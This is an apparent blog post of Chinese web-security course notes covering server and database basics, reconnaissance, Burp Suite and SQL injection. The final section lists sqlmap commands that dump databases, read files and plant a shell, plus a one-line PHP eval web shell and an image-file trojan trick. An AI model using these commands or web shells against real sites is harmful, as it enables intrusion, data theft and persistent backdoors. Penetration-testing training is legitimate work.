诚殷网络第十九期WEB基础培训笔记

第一天
服务器-----------------相当于一颗星球
空气,水,食物-----环境
人-----------------------脚本
大脑--------------------数据库

服务器(可以理解成电脑,但配置性能高好几倍)
服务器版本:windows server 2003,windows server 2008windows server 2012windows server 2016
容器(环境,服务):IIS,Apahce,Nginx,Tomcat 
电脑系统:windows xp,windows7,windows8,windows10
ISS可以解析的脚本后缀:asp ,asp.net(aspx),cer,asa,cdx,ashx
Apahce可以解析的脚本后缀:php
Nginx可以解析的脚本后缀:php
Tomcat可以解析的脚本后缀:jsp(维护耗资源)
数据库:
Access:asp,asp.net
SQL server(Mssql):asp.net,asp-----最高管理员名称sa
Mysql:jsp,php-----最高管理员名称root
Oracle:jsp-----最高管理员名称sys
网站数据请求流程:请求数据(浏览器=客户端)==》分析请求(服务端)==》查询数据库,输出请求内容==》客户端接收服务端返回数据==》浏览器展示我们请求的数据
第二天
集成环境软件(集成了容器和数据库的软件):phpstudy
IP地址(大千世界中,每一台得IP地址就相当于我们得身份证ID):
A类IP---10.
B类IP---172.
C类IP---192.
本地IP---127.0.0.1---localhost
局域网IP:连接到同一台路由器下面得电脑所组成得就叫做局域网
网络由外到内:公网==》广域网==》局域网
端口(65535个):
默认端口:http协议 80,https协议 443 ,MYAQL 3306 ,SQL server 1443 ,Oracle 1521 ,FTP 21 , 远程桌面服务端口 3389 ,Tomcat 8080
路径:绝对路径,相对路径
第三天
Mysql的连接方式:
localhost,127.0.0.1------只允许当前运行着数据库服务的计算机连接
 %  ----------------------------允许任意计算机连接到该数据库
Mysq数据库结构:
库-----四川省
表----巴中市
列----XX小区
值----X栋X号
密码处理方法: MD5加密,加盐
默认后台名称:admin.*,system.*, manage.*,login.*,administrator.*
管理员默认账户:admin,test,administrator,system
状态码:
200----存在某个文件,301----重定向URL-永久重定向,302----临时重定向,403----代表某个文件或者某个目录无权限访问
404----代表某个目录或者某个文件不存在,500----系统错误或者代码错误,502----服务器作为网关或代理,从上游服务器收到无效响应。
CDN:客户端和服务端的中转站
漏洞:目录遍历漏洞
第四天
信息收集:
目标信息收集--基于社工:ICP备案,Whois反查域名持有人信息邮箱反查,域名反查,注册人反查
WEB层面信息收集:
404+403页面信息收集---详细 http://t.cn/Eq24v2l 
根据Cookie来识别容器:
脚本什么是Cookie:根据账户与密码相互合成加密后生成的一段Key值---有时效性
Cookie类型:PHP---PHPSESSID,JSP---JSESSIONID,ASP---ASPSESSIONIDSSABDDCB,ASP.NET---ASP.NET_SessionId
第五天
Burp Suite工作原理?
客户端-----》服务端
客户端-----》Burp服务端服务端----》客户端
服务端----》Burp客户端
第六天
SQL注入漏洞:
危害:可以读取数据库里面的任何所存储的数据,还可以写入木马,或者任意文件读取
如何测试出存在SQL注入漏洞:
单引号(SQL,database,mysql),and 1=1 与 and 1=2(90%),反斜杠,负数法,加减法
SQL注入的“方法”名称:POST注入,GET注入,Cookie注入(asp),字符类型注入,数字类型注入,head头部注入,搜索框注入,宽字节注入
SQL注入类型:盲注(延迟注入)
Mysql版本区别:
Mysql5.0---1.没有安全模式  2.可以直接读取出表名
Mysql5.1---1.有安全模式  2.不可能直接获取到表名,只能够爆破形式获取
注入get类型注入漏洞的命令:
sqlmap.py -u http://192.168.1.5/hkproducts.php?oid=1
sqlmap.py -u http://192.168.1.5/hkproducts.php?oid=1 --current-db   ----得到当前网站所使用的一个数据库 名称
sqlmap.py -u http://192.168.1.5/hkproducts.php?oid=1 -D baji --tables   ----列出baji数据库中的表
sqlmap.py -u http://192.168.1.5/hkproducts.php?oid=1 -D baji -T htx_admin --dump   ----下载baji库中的表名为htx_admin中的信息
sqlmap.py -u http://192.168.1.5/hkproducts.php?oid=1 --dump   ----下载该账户名下的所有数据库
其他命令:
post注入:sqlmap.py -r 
sqlmap.py -u http://192.168.1.5/hkproducts.php?oid=1 --is-dba   ----测试当前数据库连接账户是否为最高权限用户(True=是,False=否)
sqlmap.py -u http://192.168.1.5/hkproducts.php?oid=1 --dbs   ----列出当前数据库连接账户下所管理的所有数据库
sqlmap.py -u http://192.168.1.5/hkproducts.php?oid=1 --os-shell   ----写入木马到当前网站必须有该网站的绝对路径(会写入两个文件)
sqlmap.py -u http://192.168.1.5/hkproducts.php?oid=1 --file-read"绝对路径"   ----读取文件
phpinfo.php:可能会泄露网站绝对路径
名词讲解:
shell 增,删,改,查
WEB shell:网站文件增,删,改,查的权限
木马分类:
大马
小马----隐蔽性极强,不容易被查杀
一句话----<?php @eval($_POST['1']) ?>
图片马----copy 1.jpg/b+1.txt/a asp.jpg

发表评论

路人甲

网友评论(0)